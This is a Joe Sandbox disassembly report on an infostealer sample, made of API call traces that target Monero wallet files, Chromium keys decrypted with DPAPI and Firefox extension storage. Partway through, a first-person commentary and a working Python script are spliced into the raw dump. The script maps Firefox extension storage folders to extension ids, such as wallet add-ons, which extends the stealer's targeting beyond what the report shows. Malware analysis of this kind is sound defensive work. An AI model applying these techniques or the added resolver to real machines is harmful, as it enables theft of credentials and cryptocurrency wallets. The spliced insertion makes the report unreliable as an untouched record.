                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 3da80faac736683652a2c921a943901f5aed19e822284d4ad6041d9174c43075
                                      • Instruction ID: 2a2c7ed48ca7be4a5bf64e3afb99d544986e47e5040487ad9dee3f3cd2ce2edc
                                      • Opcode Fuzzy Hash: 3da80faac736683652a2c921a943901f5aed19e822284d4ad6041d9174c43075
                                      • Instruction Fuzzy Hash: 79E11073810109ABCB04FBA4DC9AEEEBB38BF94300F508159F55772091EF746A49CB66
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052D481
                                      • lstrlen.KERNEL32(00000000), ref: 0052D698
                                      • lstrlen.KERNEL32(00000000), ref: 0052D6AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052D72B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 10bb7bbf9d20b51fef1e46687481ae3711cafecbadb6f0e289853d65d4edac1f
                                      • Instruction ID: 92a903172e5f9679b4f2c90f92087315fd71df2ac342f93e87137edf1597d636
                                      • Opcode Fuzzy Hash: 10bb7bbf9d20b51fef1e46687481ae3711cafecbadb6f0e289853d65d4edac1f
                                      • Instruction Fuzzy Hash: 1D910672910109ABDB04FBA4DC9AEEEBB38BF94300F508158F54776091EF746A09CB66
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052D801
                                      • lstrlen.KERNEL32(00000000), ref: 0052D99F
                                      • lstrlen.KERNEL32(00000000), ref: 0052D9B3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052DA32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 5d01b2b37cd7077f21c66b80a8fb0fa4e5cdd11bd36c75342d1df271db9d8a04
                                      • Instruction ID: da24577d60c4b4d9c0e4b8e6f86859b98a421e68996c3f4ea0ffc25bbc25e7ba
                                      • Opcode Fuzzy Hash: 5d01b2b37cd7077f21c66b80a8fb0fa4e5cdd11bd36c75342d1df271db9d8a04
                                      • Instruction Fuzzy Hash: 43810472910119ABCB04FBB4DC9AEEEBB38BF94300F504518F547B6091EF746A09DB66
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00541580,00540D92), ref: 0052F54C
                                      • lstrlen.KERNEL32(00000000), ref: 0052F56B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: ad613eac88453120e82bc2574e6448eebc250bc19401629d1b5f3969c80de776
                                      • Instruction ID: 3d9e003d0515d1b0bbbe5219ba743ac8f702991a2a76d2bbdce3a2d510fd234c
                                      • Opcode Fuzzy Hash: ad613eac88453120e82bc2574e6448eebc250bc19401629d1b5f3969c80de776
                                      • Instruction Fuzzy Hash: 9151F672D10109AADB04FBB4DC9ADEDBB78BFD4300F508528F45667195EF346A09CBA2
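The two literals passed to StrStrA at 0052F54C, `moz-extension+++` and `^userContextId=4294967295`, together form the naming pattern Firefox uses for an extension's storage directory under `<profile>/storage/default/` (`moz-extension+++<internal-uuid>^userContextId=4294967295`, where 4294967295 is 0xFFFFFFFF). The report only shows the substring check; the added example below (mine, not code from the sample or from Joe Sandbox) reproduces that check, contrasts it with an anchored parse, and goes one step further than the report by mapping the internal UUID back to an extension id through the `extensions.webextensions.uuids` pref in `prefs.js`. The directory names, the pref line and the extension id `wallet@example.invalid` are constructed sample data.

```python
import json
import re
from typing import Dict, List, Optional

# The two literals the report shows being passed to StrStrA at 0052F54C.
# Firefox names per-origin storage directories under <profile>/storage/default/;
# an extension origin is "moz-extension+++<internal-uuid>^userContextId=4294967295"
# (4294967295 == 0xFFFFFFFF, the userContextId Firefox assigns to extension origins).
EXT_PREFIX = "moz-extension+++"
EXT_SUFFIX = "^userContextId=4294967295"

_UUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$")

# prefs.js stores the extension-id -> internal-uuid map as a JSON object
# inside a JS string literal:  user_pref("extensions.webextensions.uuids", "{...}");
_UUIDS_PREF_RE = re.compile(
    r'user_pref\("extensions\.webextensions\.uuids",\s*"((?:[^"\\]|\\.)*)"\);'
)


def strstr_match(name: str) -> bool:
    """Unanchored substring test: exactly what two StrStrA hits establish."""
    return EXT_PREFIX in name and EXT_SUFFIX in name


def extension_uuid(name: str) -> Optional[str]:
    """Anchored variant: the internal UUID for a well-formed extension storage
    directory name, None otherwise (rejects copies such as '*.old')."""
    if not (name.startswith(EXT_PREFIX) and name.endswith(EXT_SUFFIX)):
        return None
    uuid = name[len(EXT_PREFIX):-len(EXT_SUFFIX)]
    return uuid if _UUID_RE.fullmatch(uuid) else None


def uuid_to_extension_id(prefs_js: str) -> Dict[str, str]:
    """Invert extensions.webextensions.uuids from prefs.js: internal UUID -> extension id."""
    m = _UUIDS_PREF_RE.search(prefs_js)
    if not m:
        return {}
    # Two layers: a JS string literal (JSON-compatible escapes) wrapping a JSON object.
    mapping = json.loads(json.loads('"' + m.group(1) + '"'))
    return {uuid: ext_id for ext_id, uuid in mapping.items()}


def resolve_extension_storage(dirs: List[str], prefs_js: str) -> Dict[str, str]:
    """Map extension id -> storage directory for every well-formed entry."""
    by_uuid = uuid_to_extension_id(prefs_js)
    found: Dict[str, str] = {}
    for d in dirs:
        u = extension_uuid(d)
        if u and u in by_uuid:
            found[by_uuid[u]] = d
    return found


# Constructed sample data (not taken from the analysed sample or a real profile).
SAMPLE_DIRS = [
    "moz-extension+++0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9^userContextId=4294967295",
    "https+++example.com",
    "moz-extension+++not-a-uuid^userContextId=4294967295",
    "backup-moz-extension+++0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9^userContextId=4294967295.old",
]
SAMPLE_PREFS = (
    r'user_pref("extensions.webextensions.uuids", '
    r'"{\"wallet@example.invalid\":\"0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9\"}");'
)

if __name__ == "__main__":
    for d in SAMPLE_DIRS:
        print(f"{strstr_match(d)!s:5} {extension_uuid(d)!s:40} {d}")
    print(resolve_extension_storage(SAMPLE_DIRS, SAMPLE_PREFS))
```

Note that the substring check accepts the `backup-...old` entry while the anchored parse does not; when writing detection or triage tooling around this artifact, match the whole directory name rather than the two fragments.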
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0053718C
                                      • sS, xrefs: 005372AE, 00537179, 0053717C
                                      • sS, xrefs: 00537111
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: sS$sS$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 3722407311-1259041206
                                      • Opcode ID: 5797e2bd2b2e3b3712beadcddab95b775f173575c5a82bbbc6a20ba2d1310eff
                                      • Instruction ID: 5b682618626dc96174005216a5d7503c354ded035cd1c57f2e70e147bc924d57
                                      • Opcode Fuzzy Hash: 5797e2bd2b2e3b3712beadcddab95b775f173575c5a82bbbc6a20ba2d1310eff
                                      • Instruction Fuzzy Hash: D35170B1C0421DABDB24EB90DC99BEEBB74BF48304F1044A8E21577181EB746E88DF55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: b32dff572fde97d768cf4cd1b5bd8ab57317c8269bb0e5981ce4e0e7785f52ee
                                      • Instruction ID: 46d9137150b7acdf348db7776178345ae1142fb103ed2b065a19bd2b79f44f89
                                      • Opcode Fuzzy Hash: b32dff572fde97d768cf4cd1b5bd8ab57317c8269bb0e5981ce4e0e7785f52ee
                                      • Instruction Fuzzy Hash: 2741F1B1D10209AFCB04EFA4D896AEEBB74FB54304F108418F51677291EB75AA09CF92
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00529D39
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
                                        • Part of subcall function 00529AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00524EEE,00000000,?), ref: 00529B01
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529B2A
                                        • Part of subcall function 00529AC0: LocalFree.KERNEL32(?,?,?,?,00524EEE,00000000,?), ref: 00529B3F
                                        • Part of subcall function 00529B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00529B84
                                        • Part of subcall function 00529B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00529BA3
                                        • Part of subcall function 00529B60: LocalFree.KERNEL32(?), ref: 00529BD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 147eab0e7791c3a721ab2febb2532347e6f9a1dffff4cf29c1d4597e49a01c7f
                                      • Instruction ID: ae6b425e43838b0119f5aab7826084c927b0e896ae8c3dec79254b936f0b9bdb
                                      • Opcode Fuzzy Hash: 147eab0e7791c3a721ab2febb2532347e6f9a1dffff4cf29c1d4597e49a01c7f
                                      • Instruction Fuzzy Hash: CC3154B6D10219ABCF04DFE4DC85BEFBBB8BF49304F144518E905A7281E7709A44CBA5
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005405B7), ref: 005386CA
                                      • Process32First.KERNEL32(?,00000128), ref: 005386DE
                                      • Process32Next.KERNEL32(?,00000128), ref: 005386F3
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • CloseHandle.KERNEL32(?), ref: 00538761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 823be6cc19b5a976c90ee2cdf654bbf55c17d321169c21d82919ae3e7c444f73
                                      • Instruction ID: a7234b9a588733b22d0d1a50a7792cb2c65537578215ba9f62a094e3b80125cc
                                      • Opcode Fuzzy Hash: 823be6cc19b5a976c90ee2cdf654bbf55c17d321169c21d82919ae3e7c444f73
                                      • Instruction Fuzzy Hash: 42312B72901219ABCB24EF54DC49FEEBB78FB85700F104199F50AB61A0DB746A45CFA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00540E00,00000000,?), ref: 005379B0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 005379B7
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00540E00,00000000,?), ref: 005379C4
                                      • wsprintfA.USER32 ref: 005379F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
